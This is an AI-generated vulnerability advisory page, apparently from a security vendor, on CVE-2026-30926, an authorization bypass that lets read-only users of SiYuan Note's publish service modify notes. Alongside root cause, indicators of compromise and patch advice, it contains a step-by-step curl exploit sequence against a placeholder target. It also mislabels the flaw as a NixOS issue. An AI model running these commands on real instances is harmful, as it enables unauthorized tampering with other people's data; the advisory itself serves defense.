CVE-2026-30926: 
NixOS vulnerability analysis and mitigation

Overview

CVE-2026-30926 is an authorization bypass vulnerability in SiYuan Note's publish service that allows authenticated low-privilege users (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint. It affects all versions of SiYuan (b3log/siyuan) prior to 3.5.10. The vulnerability was published on March 7, 2026, and patched in version 3.5.10 released the same day. It carries a CVSS v3.1 base score of 7.1 (High) (GitHub Advisory, GHSA).

Technical details

The root cause is classified as CWE-284 (Improper Access Control) and CWE-862 (Missing Authorization). In router.go, the /api/block/appendHeadingChildren endpoint is registered with only model.CheckAuth as its authorization middleware, which accepts sessions from RoleReader (read-only) accounts. The handler calls model.AppendHeadingChildren(id, childrenDOM), which ultimately invokes indexWriteTreeUpsertQueue(tree) in model/block.go to persist document mutations — without enforcing CheckAdminRole or CheckReadonly. Because session.go's CheckAuth does not differentiate between read-only and write-privileged roles, any authenticated publish user can perform persistent write operations (GitHub Advisory).

Impact

Successful exploitation allows any authenticated publish user with read-only privileges to append arbitrary content blocks to existing documents, compromising the integrity of stored notes. Potential impacts include unauthorized modification of private notes, content tampering in published notebooks, and loss of data integrity. There is also a risk of chaining this vulnerability with other API endpoints to escalate privileges further, though no availability impact is expected (GitHub Advisory, GHSA).

Exploitability

A complete proof-of-concept exploit consisting of sequential curl commands is publicly available in the GitHub Security Advisory (GitHub Advisory). The vulnerability requires only low-privilege authenticated access (a valid RoleReader publish account) and no user interaction, making it straightforward to exploit. The EPSS score is approximately 0.011% (0.000110), indicating a low but non-zero probability of exploitation in the wild within 30 days. There is no evidence of active in-the-wild exploitation or threat actor attribution at this time, and it is not listed in the CISA KEV catalog (GHSA).

Exploitation steps

  1. Reconnaissance: Identify a SiYuan instance with the publish service enabled (default port 6808) running a version prior to 3.5.10. Obtain or create a low-privilege publish account (RoleReader) with valid credentials.
  2. Retrieve target block ID: Using the read-only account, query the SQL API to find the block ID of a heading in the target document:
curl -u viewer:viewerpass \
  -H "Content-Type: application/json" \
  -d '{"stmt":"SELECT id,root_id FROM blocks WHERE content=\'VictimHeading\' LIMIT 1"}' \
  http://<target>:6808/api/query/sql
  1. Generate block DOM: Convert attacker-controlled HTML content into a block DOM structure using the Lute API:
curl -u viewer:viewerpass \
  -H "Content-Type: application/json" \
  -d '{"dom":"InjectedByReader"}' \
  http://<target>:6808/api/lute/html2BlockDOM
  1. Exploit the vulnerable endpoint: POST to /api/block/appendHeadingChildren with the retrieved block ID and the generated DOM payload:
curl -u viewer:viewerpass \
  -H "Content-Type: application/json" \
  -d '{ "id":"<heading-block-id>", "childrenDOM":"<generated-dom>" }' \
  http://<target>:6808/api/block/appendHeadingChildren
  1. Verify modification: Query the document blocks to confirm the attacker-controlled content has been persisted, receiving {"code":0} on success (GitHub Advisory).

Indicators of compromise

  • Network: Unexpected POST requests to /api/block/appendHeadingChildren on the publish service port (default 6808) originating from accounts with RoleReader privileges; POST requests to /api/lute/html2BlockDOM from read-only publish accounts.
  • Logs: SiYuan access logs showing RoleReader-authenticated sessions making write-method API calls to /api/block/appendHeadingChildren; SQL query API calls from publish accounts enumerating block IDs (/api/query/sql with SELECT id,root_id FROM blocks).
  • File System: Unexpected or unauthorized content appearing in notebook .sy document files within the SiYuan workspace directory, particularly new blocks appended to existing headings not created by admin users.
  • Process/Application: Document modification timestamps updated for notes that were not edited by any admin-level user; audit logs (if enabled) showing content changes attributed to read-only publish accounts (GitHub Advisory).

Mitigation and workarounds

Upgrade SiYuan to version 3.5.10 or later, which enforces proper role-based authorization checks on write endpoints. As an interim workaround, disable the publish service entirely or restrict network access to the publish service port (default 6808) to trusted users only. Administrators should also audit notebook content for unauthorized modifications made by read-only publish accounts prior to patching (GitHub Advisory, GHSA).

Community reactions

The vulnerability was reported by security researcher Zwique and disclosed via GitHub's coordinated disclosure process. An openSUSE security announcement was issued referencing the advisory. Community discussion was observed on Bluesky and aggregated by threat intelligence platforms including Feedly and Qualys (detection ID 761789). No major media coverage or notable vendor statements beyond the official advisory have been identified (GHSA, GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-103678HIGH8.1
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103680MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103679MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103497MEDIUM5.5
  • YouTrack logoYouTrack
  • cpe:2.3:a:jetbrains:youtrack
NoYesOct 01, 2026
CVE-2026-103496MEDIUM5.4
  • YouTrack logoYouTrack
  • youtrack
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management